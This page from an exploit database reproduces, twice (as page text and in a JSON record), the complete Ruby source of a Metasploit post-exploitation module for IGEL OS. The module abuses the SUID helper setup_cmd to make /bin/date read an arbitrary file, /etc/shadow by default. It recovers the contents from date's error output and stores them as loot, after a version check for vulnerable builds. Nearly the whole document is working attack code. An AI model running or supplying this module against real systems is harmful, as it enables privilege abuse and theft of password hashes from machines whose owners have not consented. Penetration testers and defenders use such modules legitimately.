IGEL OS Dump File_MSF:POST-LINUX-GATHER-IGEL_DUMP_FILE-

Description

Dump a file with escalated privileges for IGEL OS Workspace Edition sessions, by elevating rights with setupcmd SUID and outputting with date. Module Options msf use post/linux/gather/igeldumpfile msf postigeldumpfile show actions ...actions... msf...

Visit Original Source

Basic Information

ID MSF:POST-LINUX-GATHER-IGEL_DUMP_FILE-

Published Nov 26, 2025 at 18:53

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
include Msf::Post::File

def initialize(info = {})
super(
update_info(
info,
'Name' => 'IGEL OS Dump File',
'Description' => %q{
Dump a file with escalated privileges for IGEL OS Workspace Edition sessions,
by elevating rights with setup_cmd (SUID) and outputting with date.
},
'Author' => 'Zack Didcott',
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter'],
'DisclosureDate' => '2024-03-07', # Patch release date
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
)
)

register_options([
OptString.new('RPATH', [true, 'File on the target to dump', '/etc/shadow'])
])
end

def check
version = Rex::Version.new(
read_file('/etc/system-release').delete_prefix('IGEL OS').strip
)
unless version < Rex::Version.new('11.09.260')
return Exploit::CheckCode::Safe("IGEL OS #{version} is not vulnerable")
end

unless file?('/etc/setupd-usercommands.json')
return Exploit::CheckCode::Appears("IGEL OS #{version} appears to be vulnerable")
end

Exploit::CheckCode::Appears("IGEL OS #{version} should be vulnerable")
end

def run
unless [
Exploit::CheckCode::Detected,
Exploit::CheckCode::Appears,
Exploit::CheckCode::Vulnerable
].include?(check)
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end

print_status('Executing command on target')
output = create_process('/config/bin/setup_cmd', args: ['/bin/date', '-f', datastore['RPATH']])

print_status('Command completed:')
data = []
output.lines[1..].each do |line|
line = line.strip.delete_prefix(
'/bin/date: invalid date ‘'
).delete_suffix('’')
data << line
print_line(line)
end

fname = File.basename(datastore['RPATH'].downcase)
loot = store_loot("igel.#{fname}", 'text/plain', session, data.join("\n"), datastore['RPATH'])
print_status("#{datastore['RPATH']} stored in #{loot}")
end
end

{
    "lastseen": "2025-11-26T19:04:37",
    "description": "Dump a file with escalated privileges for IGEL OS Workspace Edition sessions, by elevating rights with setupcmd SUID and outputting with date. Module Options msf use post/linux/gather/igeldumpfile msf postigeldumpfile show actions ...actions... msf...",
    "published": "2025-11-26T18:53:51",
    "modified": "2025-11-26T18:53:51",
    "type": "metasploit",
    "title": "IGEL OS Dump File",
    "source": "",
    "references": "",
    "id": "MSF:POST-LINUX-GATHER-IGEL_DUMP_FILE-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n  include Msf::Post::File\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'IGEL OS Dump File',\n        'Description' => %q{\n          Dump a file with escalated privileges for IGEL OS Workspace Edition sessions,\n          by elevating rights with setup_cmd (SUID) and outputting with date.\n        },\n        'Author' => 'Zack Didcott',\n        'License' => MSF_LICENSE,\n        'Platform' => ['linux'],\n        'SessionTypes' => ['shell', 'meterpreter'],\n        'DisclosureDate' => '2024-03-07', # Patch release date\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION],\n          'SideEffects' => []\n        }\n      )\n    )\n\n    register_options([\n      OptString.new('RPATH', [true, 'File on the target to dump', '/etc/shadow'])\n    ])\n  end\n\n  def check\n    version = Rex::Version.new(\n      read_file('/etc/system-release').delete_prefix('IGEL OS').strip\n    )\n    unless version < Rex::Version.new('11.09.260')\n      return Exploit::CheckCode::Safe(\"IGEL OS #{version} is not vulnerable\")\n    end\n\n    unless file?('/etc/setupd-usercommands.json')\n      return Exploit::CheckCode::Appears(\"IGEL OS #{version} appears to be vulnerable\")\n    end\n\n    Exploit::CheckCode::Appears(\"IGEL OS #{version} should be vulnerable\")\n  end\n\n  def run\n    unless [\n      Exploit::CheckCode::Detected,\n      Exploit::CheckCode::Appears,\n      Exploit::CheckCode::Vulnerable\n    ].include?(check)\n      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')\n    end\n\n    print_status('Executing command on target')\n    output = create_process('/config/bin/setup_cmd', args: ['/bin/date', '-f', datastore['RPATH']])\n\n    print_status('Command completed:')\n    data = []\n    output.lines[1..].each do |line|\n      line = line.strip.delete_prefix(\n        '/bin/date: invalid date \u2018'\n      ).delete_suffix('\u2019')\n      data << line\n      print_line(line)\n    end\n\n    fname = File.basename(datastore['RPATH'].downcase)\n    loot = store_loot(\"igel.#{fname}\", 'text/plain', session, data.join(\"\\n\"), datastore['RPATH'])\n    print_status(\"#{datastore['RPATH']} stored in #{loot}\")\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/igel_dump_file.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/post/linux/gather/igel_dump_file/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply